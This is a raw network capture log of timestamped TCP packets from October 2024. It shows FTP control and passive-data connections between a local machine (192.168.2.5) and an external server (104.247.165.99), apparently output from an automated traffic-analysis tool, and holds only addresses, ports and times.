                                      Oct 3, 2024 09:13:20.812498093 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.431574106 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.431868076 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.436781883 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436795950 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436858892 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.436880112 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436898947 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436908960 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436917067 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436927080 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436949968 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.436974049 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436984062 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.436989069 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.437002897 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.437021017 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.437047005 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.437060118 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.441701889 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441749096 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441759109 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441768885 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441768885 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.441788912 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441798925 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441816092 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.441895008 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441916943 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.441942930 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441953897 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441983938 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.441992998 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.442013025 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.446676970 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446732044 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446849108 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.446881056 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447551966 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447608948 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447633982 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447643995 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447662115 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447696924 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447705984 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447731972 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447778940 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447788000 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447798014 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447808027 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.447817087 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.448158026 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.448213100 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.590292931 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:21.923731089 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:21.980931997 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.048399925 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.053246975 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.266415119 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.266824007 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.271759033 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.271823883 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.271961927 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.276750088 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.932480097 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.933824062 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942157030 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942169905 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942178965 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942183018 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942190886 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942200899 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942209005 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942226887 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942270994 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.942431927 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942441940 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942451000 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.942490101 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.950092077 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950102091 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950109959 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950119019 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950122118 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950125933 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.950189114 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.951222897 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951232910 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951241970 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951245070 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951248884 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.951272011 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.951325893 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.957278013 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957288980 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957297087 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957305908 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957314968 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957324028 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957333088 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957340956 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957350016 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957357883 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957367897 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957583904 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957595110 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957603931 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957614899 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957806110 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957814932 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957823992 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957832098 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957840919 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957849026 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957858086 CEST6018249751104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:25.957918882 CEST4975160182192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:25.982042074 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:26.427440882 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:26.480937004 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.314317942 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.319236994 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.532078981 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.532481909 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.537334919 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:27.537517071 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.537539005 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:27.542768002 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.134341002 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.134675026 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.139692068 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139734030 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.139813900 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139823914 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.139885902 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.140099049 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140109062 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140117884 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140127897 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140136003 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140145063 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140152931 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.140161991 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.140196085 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144524097 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144639015 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144645929 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144674063 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144681931 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144702911 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144907951 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144917965 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144927025 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.144959927 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.144975901 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149282932 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149292946 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149302006 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149312019 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149321079 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149329901 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149338961 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149372101 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.149410009 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149488926 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.149749994 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154170990 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154181957 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.154191017 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164268017 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164282084 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164290905 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164294004 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164299011 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164310932 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164320946 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164335966 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164346933 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.164994001 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165005922 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165014982 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165024996 CEST4974449752104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.165076971 CEST4975249744192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.184036970 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:28.594593048 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:28.637181044 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.282485962 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.439296961 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.653872013 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.654572964 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.662679911 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:33.662751913 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.662830114 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:33.670684099 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.317076921 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.317307949 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.322846889 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.322856903 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.322868109 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323420048 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323429108 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323437929 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323446989 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323455095 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323456049 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.323519945 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323529959 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.323542118 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.323622942 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328499079 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328509092 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328516960 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328751087 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328783035 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328861952 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328871012 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.328886986 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.328964949 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.331235886 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.331703901 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.335576057 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337330103 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337338924 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337347984 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337584019 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337594986 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337603092 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337610960 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.337620020 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.339523077 CEST5999149753104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.340044975 CEST4975359991192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.371556044 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:34.809006929 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:34.855897903 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.776626110 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.798456907 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:35.880237103 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:35.885603905 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:35.885665894 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.041918039 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.042345047 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.057286024 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.057363033 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.057435036 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.065145016 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.617619991 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.618010998 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.625228882 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.690882921 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.691113949 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.723073959 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723392010 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723434925 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723447084 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723457098 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723460913 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.723639011 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.726763964 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726773977 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726783037 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726787090 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.726933002 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.730897903 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.739954948 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.739968061 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.739975929 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740137100 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740145922 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740154982 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740200043 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.740245104 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.740987062 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.740998030 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.741336107 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.741466045 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.741904020 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.743628025 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.750085115 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750096083 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750103951 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750335932 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.750605106 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750614882 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750624895 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750628948 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750637054 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.750773907 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.752080917 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.752091885 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.752934933 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.757874966 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.757886887 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.757899046 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.758008003 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.758017063 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.758027077 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.759241104 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.759251118 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.759259939 CEST6143449755104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.759510040 CEST4975561434192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.852281094 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:36.853719950 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:36.877744913 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.130883932 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.131859064 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.139326096 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.178802013 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.220681906 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.225671053 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.358197927 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.358360052 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.363308907 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.438071966 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.438523054 CEST4975662425192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.443562031 CEST6242549756104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.443625927 CEST4975662425192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.443713903 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.448888063 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.591453075 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.591599941 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.596528053 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.815694094 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:37.820837021 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:37.825685978 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.044735909 CEST2149754104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.045229912 CEST4975757937192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:38.048470974 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.048676014 CEST4975662425192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:38.050257921 CEST5793749757104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.050405979 CEST4975421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:38.050463915 CEST4975757937192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:38.053761005 CEST6242549756104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.053770065 CEST6242549756104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.053780079 CEST6242549756104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:38.053841114 CEST6242549756104.247.165.99192.168.2.5
